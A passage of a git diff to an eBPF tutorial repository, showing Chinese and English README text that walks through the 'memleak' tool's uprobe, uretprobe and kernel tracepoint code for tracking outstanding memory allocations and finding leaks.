已存在,那么更新 value,否则就新建一个条目。 + +最后,如果启用了 `trace_all` 标志,函数将打印一条信息,说明发生了内存分配。 + +`BPF_KPROBE` 宏用于 + +最后定义了 `BPF_KPROBE(malloc_enter, size_t size)`,它会在 `malloc` 函数被调用时被 BPF uprobe 拦截执行,并通过 `gen_alloc_enter` 来记录内存分配大小。 +我们刚刚分析了内存分配的入口函数 `gen_alloc_enter`,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 `gen_alloc_exit2` 函数以及如何从内存分配调用中获取返回的内存地址。 + +```c +static int gen_alloc_exit2(void *ctx, u64 address) +{ + const pid_t pid = bpf_get_current_pid_tgid() >> 32; + struct alloc_info info; + + const u64* size = bpf_map_lookup_elem(&sizes, &pid); + if (!size) + return 0; // missed alloc entry + + __builtin_memset(&info, 0, sizeof(info)); + + info.size = *size; + bpf_map_delete_elem(&sizes, &pid); + + if (address != 0) { + info.timestamp_ns = bpf_ktime_get_ns(); + + info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags); + + bpf_map_update_elem(&allocs, &address, &info, BPF_ANY); + + update_statistics_add(info.stack_id, info.size); + } + + if (trace_all) { + bpf_printk("alloc exited, size = %lu, result = %lx\n", + info.size, address); + } + + return 0; +} +static int gen_alloc_exit(struct pt_regs *ctx) +{ + return gen_alloc_exit2(ctx, PT_REGS_RC(ctx)); +} + +SEC("uretprobe") +int BPF_KRETPROBE(malloc_exit) +{ + return gen_alloc_exit(ctx); +} +``` + +`gen_alloc_exit2` 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 `ctx`,另一个是内存分配函数返回的内存地址 `address`。 + +首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 `sizes` 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。 + +接着,函数清除 `info` 结构体的内容,并设置它的 `size` 字段为之前在 map 中找到的内存分配大小。并从 `sizes` 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。 + +接下来,如果 `address` 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 `info` 结构体中,并随后更新到 `allocs` 这个 map 中。 + +最后,函数调用 `update_statistics_add` 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。 + +请注意,`gen_alloc_exit` 函数是 `gen_alloc_exit2` 的一个包装,它将 `PT_REGS_RC(ctx)` 作为 `address` 参数传递给 `gen_alloc_exit2`。` +在我们的讨论中,我们刚刚提到在 `gen_alloc_exit2` 函数中,调用了 `update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。 + +```c +static void update_statistics_add(u64 stack_id, u64 sz) +{ + union combined_alloc_info *existing_cinfo; + + existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo); + if (!existing_cinfo) + return; + + const union combined_alloc_info incremental_cinfo = { + .total_size = sz, + .number_of_allocs = 1 + }; + + __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits); +} +``` + +`update_statistics_add` 函数接收两个参数:当前的堆栈 ID `stack_id` 以及内存分配的大小 `sz`。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。 + +首先,函数尝试在 `combined_allocs` 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 `initial_cinfo`(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。 + +接着,函数创建一个 `incremental_cinfo`,并设置它的 `total_size` 为当前内存分配的大小,设置 `number_of_allocs` 为 1。这是因为每次调用 `update_statistics_add` 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 `sz`。 + +最后,函数使用 `__sync_fetch_and_add` 函数原子地将 `incremental_cinfo` 的值加到 `existing_cinfo` 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 `update_statistics_add` 函数,每个内存分配事件也能正确地记录到统计数据中。 + +总的来说,`update_statistics_add` 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。 +在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 `update_statistics_del` 的函数,其作用是在内存释放时更新统计信息。而 `gen_free_enter` 函数则是在进程调用 `free` 函数时被执行。 + +```c +static void update_statistics_del(u64 stack_id, u64 sz) +{ + union combined_alloc_info *existing_cinfo; + + existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id); + if (!existing_cinfo) { + bpf_printk("failed to lookup combined allocs\n"); + return; + } + + const union combined_alloc_info decremental_cinfo = { + .total_size = sz, + .number_of_allocs = 1 + }; + + __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits); +} +``` + +`update_statistics_del` 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 `combined_allocs` 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 `combined_alloc_info` 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 `decremental_cinfo` 的 `combined_alloc_info` 结构体,设置它的 `total_size` 为要释放的内存大小,设置 `number_of_allocs` 为 1。然后使用 `__sync_fetch_and_sub` 函数原子地从 `existing_cinfo` 中减去 `decremental_cinfo` 的值。请注意,这里的 `number_of_allocs` 是负数,表示减少了一个内存分配。 + +```c +static int gen_free_enter(const void *address) +{ + const u64 addr = (u64)address; + + const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr); + if (!info) + return 0; + + bpf_map_delete_elem(&allocs, &addr); + update_statistics_del(info->stack_id, info->size); + + if (trace_all) { + bpf_printk("free entered, address = %lx, size = %lu\n", + address, info->size); + } + + return 0; +} + +SEC("uprobe") +int BPF_KPROBE(free_enter, void *address) +{ + return gen_free_enter(address); +} +``` + +接下来看 `gen_free_enter` 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 `allocs` 这个 map 中使用这个地址作为键来查找对应的 `alloc_info` 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 `update_statistics_del` 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。 +在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。 + +```c +SEC("tracepoint/kmem/kfree") +int memleak__kfree(void *ctx) +{ + const void *ptr; + + if (has_kfree()) { + struct trace_event_raw_kfree___x *args = ctx; + ptr = BPF_CORE_READ(args, ptr); + } else { + struct trace_event_raw_kmem_free___x *args = ctx; + ptr = BPF_CORE_READ(args, ptr); + } + + return gen_free_enter(ptr); +} +``` + +上述代码片段定义了一个函数memleak__kfree,这是一个bpf程序,会在内核调用kfree函数时执行。首先,该函数检查是否存在kfree函数。如果存在,则会读取传递给kfree函数的参数(即要释放的内存块的地址),并保存到变量ptr中;否则,会读取传递给kmem_free函数的参数(即要释放的内存块的地址),并保存到变量ptr中。接着,该函数会调用之前定义的gen_free_enter函数来处理该内存块的释放。 + +```c +SEC("tracepoint/kmem/kmem_cache_alloc") +int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) +{ + if (wa_missing_free) + gen_free_enter(ctx->ptr); + + gen_alloc_enter(ctx->bytes_alloc); + + return gen_alloc_exit2(ctx, (u64)(ctx->ptr)); +} +``` + +这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。 + +这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。 + +在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。 + +### 用户态程序 + +在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。 + +```c +int attach_uprobes(struct memleak_bpf *skel) +{ + ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); + ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); + + ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); + ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); + + ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); + ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); + + ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); + ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); + + ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, free, free_enter); + ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); + + // the following probes are intentinally allowed to fail attachment + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, valloc, valloc_enter); + ATTACH_URETPROBE(skel, valloc, valloc_exit); + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, pvalloc, pvalloc_enter); + ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); + + // added in C11 + ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); + ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); + + return 0; +} +``` + +在这段代码中,我们看到一个名为`attach_uprobes`的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。 + +这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。 + +在具体的实现中,我们使用了`ATTACH_UPROBE`和`ATTACH_URETPROBE`两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。 + +这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。 + +这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。 + +注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。 + +完整的源代码: 关于如何安装依赖,请参考: + +## 编译运行 + +```console +$ make +$ sudo ./memleak +using default object: libc.so.6 +using page size: 4096 +tracing kernel: true +Tracing outstanding memory allocs... Hit Ctrl-C to end +[17:17:27] Top 10 stacks with outstanding allocations: +1236992 bytes in 302 allocations from stack + 0 [] + 1 [] + 2 [] + 3 [] + 4 [] + 5 [] + 6 [] +... +``` + +## 总结 + +通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。 + +参考资料: diff --git a/src/16-memleak/README_en.md b/src/16-memleak/README_en.md deleted file mode 100644 index 03d3494..0000000 --- a/src/16-memleak/README_en.md +++ /dev/null @@ -1,447 +0,0 @@ -# eBPF Tutorial by Example 16: Monitoring Memory Leaks - -eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code. - -In this tutorial, we will explore how to write a Memleak program using eBPF to monitor memory leaks in programs. - -## Background and Importance - -Memory leaks are a common problem in computer programming and should not be underestimated. When memory leaks occur, programs gradually consume more memory resources without properly releasing them. Over time, this behavior can lead to a gradual depletion of system memory, significantly reducing the overall performance of the program and system. - -There are many possible causes of memory leaks. It may be due to misconfiguration, such as a program incorrectly configuring dynamic allocation of certain resources. It may also be due to software bugs or incorrect memory management strategies, such as forgetting to release memory that is no longer needed during program execution. Additionally, if an application's memory usage is too high, system performance may significantly decrease due to paging/swapping, or it may even cause the application to be forcibly terminated by the system's OOM killer (Out of Memory Killer). - -### Challenges of Debugging Memory Leaks - -Debugging memory leak issues is a complex and challenging task. This involves detailed examination of the program's configuration, memory allocation, and deallocation, often requiring specialized tools to aid in diagnosis. For example, there are tools that can associate malloc() function calls with specific detection tools, such as Valgrind memcheck, which can simulate the CPU to check all memory accesses, but may greatly slow down the application's execution speed. Another option is to use heap analyzers, such as libtcmalloc, which are relatively faster but may still decrease the application's execution speed by more than five times. Additionally, there are tools like gdb that can obtain core dumps of applications and perform post-processing analysis of memory usage. However, these tools often require pausing the application during core dump acquisition or calling the free() function after the application terminates. - -## Role of eBPF - -In this context, the role of eBPF becomes particularly important. eBPF provides an efficient mechanism for monitoring and tracking system-level events, including memory allocation and deallocation. With eBPF, we can trace memory allocation and deallocation requests and collect the call stacks for each allocation. We can then analyze this information to identify call stacks that perform memory allocations but do not perform subsequent deallocations, helping us identify the source of memory leaks. The advantage of this approach is that it can be done in real-time within a running application without pausing the application or performing complex post-processing. - -The `memleak` eBPF tool can trace and match memory allocation and deallocation requests, and collect the call stacks for each allocation. Subsequently, `memleak` can print a summary indicating which call stacks executed allocations but did not perform subsequent deallocations. For example, running the command: - -```console -# ./memleak -p $(pidof allocs) -Attaching to pid 5193, Ctrl+C to quit. -[11:16:33] Top 2 stacks with outstanding allocations: - 80 bytes in 5 allocations from stack - main+0x6d [allocs] - __libc_start_main+0xf0 [libc-2.21.so] - -[11:16:34] Top 2 stacks with outstanding allocations: - 160 bytes in 10 allocations from stack - main+0x6d [allocs] - __libc_start_main+0xf0 [libc-2.21.so] -``` - -After running this command, we can see which stacks the allocated but not deallocated memory came from, as well as the size and quantity of these unreleased memory blocks. - -Over time, it becomes evident that the `main` function of the `allocs` process is leaking memory, 16 bytes at a time. Fortunately, we don't need to inspect each allocation; we have a nice summary that tells us which stack is responsible for the significant leaks. - -## Implementation Principle of memleak - -At a basic level, `memleak` operates by installing monitoring devices on the memory allocation and deallocation paths. It achieves this by inserting eBPF programs into memory allocation and deallocation functions. This means that when these functions are called, `memleak` will record important information, such as the caller's process ID (PID), the allocated memory address, and the size of the allocated memory. When the function for freeing memory is called, `memleak` will delete the corresponding memory allocation record in its internal map. This mechanism allows `memleak` to accurately trace which memory blocks have been allocated but not deallocated.For commonly used memory allocation functions in user space, such as `malloc` and `calloc`, `memleak` uses user space probing (uprobe) technology for monitoring. Uprobe is a dynamic tracing technology for user space applications, which can set breakpoints at any location at runtime without modifying the binary files, thus achieving tracing of specific function calls. - -Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -For kernel space memory allocation functions, such as `kmalloc`, `memleak` chooses to use tracepoints for monitoring. Tracepoint is a dynamic tracing technology provided in the Linux kernel, which can dynamically trace specific events in the kernel at runtime without recompiling the kernel or loading kernel modules. - -## Kernel Space eBPF Program Implementation - -## `memleak` Kernel Space eBPF Program Implementation - -The kernel space eBPF program of `memleak` contains some key functions for tracking memory allocation and deallocation. Before delving into these functions, let's first take a look at some data structures defined by `memleak`, which are used in both its kernel space and user space programs. - -```c -#ifndef __MEMLEAK_H -#define __MEMLEAK_H - -#define ALLOCS_MAX_ENTRIES 1000000 -#define COMBINED_ALLOCS_MAX_ENTRIES 10240 - -struct alloc_info { - __u64 size; // Size of allocated memory - __u64 timestamp_ns; // Timestamp when allocation occurs, in nanoseconds - int stack_id; // Call stack ID when allocation occurs -}; - -union combined_alloc_info { - struct { - __u64 total_size : 40; // Total size of all unreleased allocations - __u64 number_of_allocs : 24; // Total number of unreleased allocations - }; - __u64 bits; // Bitwise representation of the structure -}; - -#endif /* __MEMLEAK_H */ -``` - -Here, two main data structures are defined: `alloc_info` and `combined_alloc_info`. - -The `alloc_info` structure contains basic information about a memory allocation, including the allocated memory size `size`, the timestamp `timestamp_ns` when the allocation occurs, and the call stack ID `stack_id` that triggers the allocation. - -The `combined_alloc_info` is a union that contains an embedded structure and a `__u64` type bitwise representation `bits`. The embedded structure has two members: `total_size` and `number_of_allocs`, representing the total size and total count of unreleased allocations, respectively. The numbers 40 and 24 indicate the number of bits occupied by the `total_size` and `number_of_allocs` members, limiting their size. By using this limitation, storage space for the `combined_alloc_info` structure can be saved. Moreover, since `total_size` and `number_of_allocs` share the same `unsigned long long` type variable `bits` for storage, bitwise operations on the member variable `bits` can be used to access and modify `total_size` and `number_of_allocs`, avoiding the complexity of defining additional variables and functions in the program. - -Next, `memleak` defines a series of eBPF maps for storing memory allocation information and analysis results. These maps are defined in the form of `SEC(".maps")`, indicating that they belong to the mapping section of the eBPF program. - -```c -const volatile size_t min_size = 0; -const volatile size_t max_size = -1; -const volatile size_t page_size = 4096; -const volatile __u64 sample_rate = 1; -const volatile bool trace_all = false; -const volatile __u64 stack_flags = 0; -const volatile bool wa_missing_free = false; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, pid_t); - __type(value, u64); - __uint(max_entries, 10240); -} sizes SEC(".maps"); - -struct { - //... (continued)__uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); /* address */ - __type(value, struct alloc_info); - __uint(max_entries, ALLOCS_MAX_ENTRIES); -} allocs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); /* stack id */ - __type(value, union combined_alloc_info); - __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES); -} combined_allocs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __type(key, u64); - __type(value, u64); - __uint(max_entries, 10240); -} memptrs SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_STACK_TRACE); - __type(key, u32); -} stack_traces SEC(".maps"); - -static union combined_alloc_info initial_cinfo; -``` - -The code first defines some configurable parameters, such as `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags`, and `wa_missing_free`, representing the minimum allocation size, maximum allocation size, page size, sample rate, whether to trace all allocations, stack flags, and whether to work in missing free mode. - -Then, five maps are defined: - -1. `sizes`: This is a hash-type map with the key as the process ID and the value as `u64` type, storing the allocation size of each process. -2. `allocs`: This is also a hash-type map with the key as the allocation address and the value as the `alloc_info` structure, storing detailed information about each memory allocation. -3. `combined_allocs`: This is another hash-type map with the key as the stack ID and the value as the `combined_alloc_info` union, storing the total size and count of all unreleased allocations. -4. `memptrs`: This is also a hash-type map with both the key and value as `u64` type, used to pass memory pointers between user space and kernel space. -5. `stack_traces`: This is a stack trace-type map with the key as `u32` type, used to store stack IDs. - -Taking the user-space memory allocation tracing as an example, it mainly hooks memory-related function calls such as `malloc`, `free`, `calloc`, `realloc`, `mmap`, and `munmap` to record data when these functions are called. In user space, `memleak` mainly uses uprobes technology for hooking. - -Each function call is divided into "enter" and "exit" parts. The "enter" part records the function call parameters, such as the size of the allocation or the address being freed. The "exit" part is mainly used to obtain the return value of the function, such as the memory address obtained from the allocation. - -Here, `gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` are functions that implement the recording behavior, and they are used to record relevant information when allocation starts, allocation ends, and freeing starts, respectively. - -The function prototype is as follows: - -```c -SEC("uprobe") -int BPF_KPROBE(malloc_enter, size_t size) -{ - // Record relevant information when allocation starts - return gen_alloc_enter(size); -} - -SEC("uretprobe") -int BPF_KRETPROBE(malloc_exit) -{ - // Record relevant information when allocation ends - return gen_alloc_exit(ctx); -} - -SEC("uprobe") -int BPF_KPROBE(free_enter, void *address) -{ - // Record relevant information when freeing starts - return gen_free_enter(address); -} -``` - -`malloc_enter` and `free_enter` are probes mounted at the entry points of the `malloc` and `free` functions, respectively, to record data during function calls. `malloc_exit` is a probe mounted at the return point of the `malloc` function to record the return value of the function. - -These functions are declared using the `BPF_KPROBE` and `BPF_KRETPROBE` macros, which are used to declare kprobes (kernel probes) and kretprobes (kernel return probes), respectively. Specifically, kprobe is triggered during function calls, while kretprobe is triggered during function returns. - -The `gen_alloc_enter` function is called at the beginning of a memory allocation request. This function is mainly responsible for collecting some basic information when the function that allocates memory is called. Now, let's take a deep dive into the implementation of this function. - -```c -static int gen_alloc_enter(size_t size) -{ - if (size < min_size || size > max_size) - return 0; - - if (sample_rate > 1) { - if (bpf_ktime_get_ns() % sample_rate != 0) - return 0; - } - - const pid_t pid = bpf_get_current_pid_tgid() >> 32; - bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY); - - if (trace_all) - bpf_printk("alloc entered, size = %lu\n", size); - - return 0; -} - -SEC("uprobe") -int BPF_KPROBE(malloc_enter, size_t size) -{ - return gen_alloc_enter(size); -} -``` - -First, the `gen_alloc_enter` function takes a `size` parameter that represents the size of the requested memory allocation. If this value is not between `min_size` and `max_size`, the function will return directly without performing any further operations. This allows the tool to focus on tracing memory allocation requests within a specific range and filter out uninteresting allocation requests. - -Next, the function checks the sampling rate `sample_rate`. If `sample_rate` is greater than 1, it means that we don't need to trace all memory allocation requests, but rather trace them periodically. Here, `bpf_ktime_get_ns` is used to get the current timestamp, and the modulus operation is used to determine whether to trace the current memory allocation request. This is a common sampling technique used to reduce performance overhead while providing a representative sample for analysis. - -Then, the function uses the `bpf_get_current_pid_tgid` function to retrieve the current process's PID. Note that the PID here is actually a combination of the process ID and thread ID, and we shift it right by 32 bits to get the actual process ID. - -The function then updates the `sizes` map, which uses the process ID as the key and the requested memory allocation size as the value. `BPF_ANY` indicates that if the key already exists, the value will be updated; otherwise, a new entry will be created. - -Finally, if the `trace_all` flag is enabled, the function will print a message indicating that a memory allocation has occurred. - -The `BPF_KPROBE` macro is used to intercept the execution of the `malloc` function with a BPF uprobe when the `malloc_enter` function is called, and it records the memory allocation size using `gen_alloc_enter`. -We have just analyzed the entry function `gen_alloc_enter` of memory allocation, now let's focus on the exit part of this process. Specifically, we will discuss the `gen_alloc_exit2` function and how to obtain the returned memory address from the memory allocation call. - -```c -static int gen_alloc_exit2(void *ctx, u64 address) -{ - const pid_t pid = bpf_get_current_pid_tgid() >> 32; - struct alloc_info info; - - const u64* size = bpf_map_lookup_elem(&sizes, &pid); - if (!size) - return 0; // missed alloc entry - - __builtin_memset(&info, 0, sizeof(info)); - - info.size = *size;bpf_map_delete_elem(&sizes, &pid); - - if (address != 0) { - info.timestamp_ns = bpf_ktime_get_ns(); - - info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags); - - bpf_map_update_elem(&allocs, &address, &info, BPF_ANY); - - update_statistics_add(info.stack_id, info.size); - } - - if (trace_all) { - bpf_printk("alloc exited, size = %lu, result = %lx\n", - info.size, address); - } - - return 0; -} - -static int gen_alloc_exit(struct pt_regs *ctx) -{ - return gen_alloc_exit2(ctx, PT_REGS_RC(ctx)); -} - -SEC("uretprobe") -int BPF_KRETPROBE(malloc_exit) -{ - return gen_alloc_exit(ctx); -} -``` - -`gen_alloc_exit2` function is called when the memory allocation operation is completed. This function takes two parameters, one is the context `ctx` and the other is the memory address returned by the memory allocation function `address`. - -First, it obtains the PID (Process ID) of the current thread and uses it as a key to look up the corresponding memory allocation size in the `sizes` map. If not found (i.e., no entry for the memory allocation operation), the function simply returns. - -Then, it clears the content of the `info` structure and sets its `size` field to the memory allocation size found in the map. It also removes the corresponding element from the `sizes` map because the memory allocation operation has completed and this information is no longer needed. - -Next, if `address` is not zero (indicating a successful memory allocation operation), the function further collects some additional information. First, it obtains the current timestamp as the completion time of the memory allocation and fetches the current stack trace. These pieces of information are stored in the `info` structure and subsequently updated in the `allocs` map. - -Finally, the function calls `update_statistics_add` to update the statistics data and, if tracing of all memory allocation operations is enabled, it prints some information about the memory allocation operation. - -Note that, `gen_alloc_exit` is a wrapper for `gen_alloc_exit2`, which passes `PT_REGS_RC(ctx)` as the `address` parameter to `gen_alloc_exit2`. - -In our discussion, we just mentioned that `update_statistics_add` function is called in the `gen_alloc_exit2` function to update the statistics data for memory allocations. Now let's take a closer look at the implementation of this function. - -```c -static void update_statistics_add(u64 stack_id, u64 sz) -{ - union combined_alloc_info *existing_cinfo; - - existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo); - if (!existing_cinfo) - return; - - const union combined_alloc_info incremental_cinfo = { - .total_size = sz, - .number_of_allocs = 1 - }; - - __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits); -} -``` - -The `update_statistics_add` function takes two parameters: the current stack ID `stack_id` and the size of the memory allocation `sz`. These two parameters are collected in the memory allocation event and used to update the statistics data for memory allocations.First, the function tries to find the element with the current stack ID as the key in the `combined_allocs` map. If it is not found, a new element is initialized with `initial_cinfo` (which is a default `combined_alloc_info` structure with all fields set to zero). - -Next, the function creates an `incremental_cinfo` and sets its `total_size` to the current memory allocation size and `number_of_allocs` to 1. This is because each call to the `update_statistics_add` function represents a new memory allocation event, and the size of this event's memory allocation is `sz`. - -Finally, the function atomically adds the value of `incremental_cinfo` to `existing_cinfo` using the `__sync_fetch_and_add` function. Note that this step is thread-safe, so even if multiple threads call the `update_statistics_add` function concurrently, each memory allocation event will be correctly recorded in the statistics. - -In summary, the `update_statistics_add` function implements the logic for updating memory allocation statistics. By maintaining the total amount and number of memory allocations for each stack ID, we can gain insight into the memory allocation behavior of the program. - -In our process of tracking memory allocation statistics, we not only need to count memory allocations but also consider memory releases. In the above code, we define a function called `update_statistics_del` that updates the statistics when memory is freed. The function `gen_free_enter` is executed when the process calls the `free` function. - -The `update_statistics_del` function takes the stack ID and the size of the memory block to be freed as parameters. First, the function uses the current stack ID as the key to look up the corresponding `combined_alloc_info` structure in the `combined_allocs` map. If it is not found, an error message is output and the function returns. If it is found, a `decremental_cinfo` `combined_alloc_info` structure is constructed with its `total_size` set to the size of the memory to be freed and `number_of_allocs` set to 1. Then the `__sync_fetch_and_sub` function is used to atomically subtract the value of `decremental_cinfo` from `existing_cinfo`. Note that the `number_of_allocs` here is negative, indicating a decrease in memory allocation. - -The `gen_free_enter` function takes the address to be freed as a parameter. It first converts the address to an unsigned 64-bit integer (`u64`). Then it looks up the `alloc_info` structure in the `allocs` map using the address as the key. If it is not found, the function returns 0. If it is found, the `alloc_info` structure is deleted from the `allocs` map, and the `update_statistics_del` function is called with the stack ID and size from `info`. If `trace_all` is true, an information message is output. - -```c -int BPF_KPROBE(free_enter, void *address) -{ - return gen_free_enter(address); -} -``` - -Next, let's look at the `gen_free_enter` function. It takes an address as a parameter, which is the result of memory allocation, i.e., the starting address of the memory to be freed. The function first uses this address as a key to search for the corresponding `alloc_info` structure in the `allocs` map. If it is not found, it simply returns because it means that this address has not been allocated. If it is found, the element is deleted, and the `update_statistics_del` function is called to update the statistics data. Finally, if global tracking is enabled, a message is also output, including this address and its size. - -While tracking and profiling memory allocation, we also need to track kernel-mode memory allocation and deallocation. In the Linux kernel, the `kmem_cache_alloc` function and the `kfree` function are used for kernel-mode memory allocation and deallocation, respectively. - -```c -SEC("tracepoint/kmem/kfree") -int memleak__kfree(void *ctx) -{ - const void *ptr; - - if (has_kfree()) { - struct trace_event_raw_kfree___x *args = ctx; - ptr = BPF_CORE_READ(args, ptr); - } else { - struct trace_event_raw_kmem_free___x *args = ctx; - ptr = BPF_CORE_READ(args, ptr); - } - - return gen_free_enter(ptr); -} -``` - -The above code snippet defines a function `memleak__kfree`. This is a BPF program that will be executed when the `kfree` function is called in the kernel. First, the function checks if `kfree` exists. If it does, it reads the argument passed to the `kfree` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Otherwise, it reads the argument passed to the `kmem_free` function (i.e., the address of the memory block to be freed) and saves it in the variable `ptr`. Then, the function calls the previously defined `gen_free_enter` function to handle the release of this memory block. - -```c -SEC("tracepoint/kmem/kmem_cache_alloc") -int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx) -{ - if (wa_missing_free) - gen_free_enter(ctx->ptr); - - gen_alloc_enter(ctx->bytes_alloc); - - return gen_alloc_exit2(ctx, (u64)(ctx->ptr)); -} -``` - -This code snippet defines a function `memleak__kmem_cache_alloc`. 